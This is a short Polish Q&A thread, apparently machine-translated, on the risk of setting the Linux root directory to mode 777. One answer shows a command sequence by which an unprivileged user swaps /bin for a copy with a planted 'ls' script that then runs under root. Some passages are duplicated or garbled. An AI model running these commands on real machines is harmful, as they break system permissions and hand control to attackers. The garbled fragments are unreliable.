tzn . sudo chmod /nie sudo chmod -r /.
Do czego atakujący może uzyskać dostęp? Czy to w porządku w przypadku komputera osobistego?
tzn . sudo chmod /nie sudo chmod -r /.
Do czego atakujący może uzyskać dostęp? Czy to w porządku w przypadku komputera osobistego?
Odpowiedzi:
Osoba atakująca (nieuprzywilejowany użytkownik) byłaby w stanie utworzyć nowe katalogi i pliki w katalogu głównym oraz zmienić nazwę dowolnego istniejącego katalogu w /(na przykład na losową wartość skutecznie uniemożliwiającą korzystanie z komputera).
W połączeniu pozwala nieuprzywilejowanym użytkownikom zastępować istniejące katalogi własnymi treściami. Myśleć /bin. Pierwszy:
sudo chmod 777 /
Teraz część atakującego (nieuprzywilejowanego użytkownika):
cp -r /bin /newbin
echo "echo boo running my own code as 'whoami'" > /newbin/ls
chmod +x /newbin/ls
mv /bin /oldbin
/oldbin/mv /newbin /bin
Teraz sprawdź to:
sudo -i
ls
Skutecznie daje atakującemu prosty sposób na posiadanie maszyny.
/ma uprawnienia 777, nieuprzywilejowani użytkownicy mogą tworzyć nowe katalogi i usuwać puste katalogi, ale nie mogą dodawać plików ani usuwać plików z chronionych podkatalogów, takich jak /bin.
/binna /random-bini tworzenie własnych /binjest tak dobry jak usunięcie go.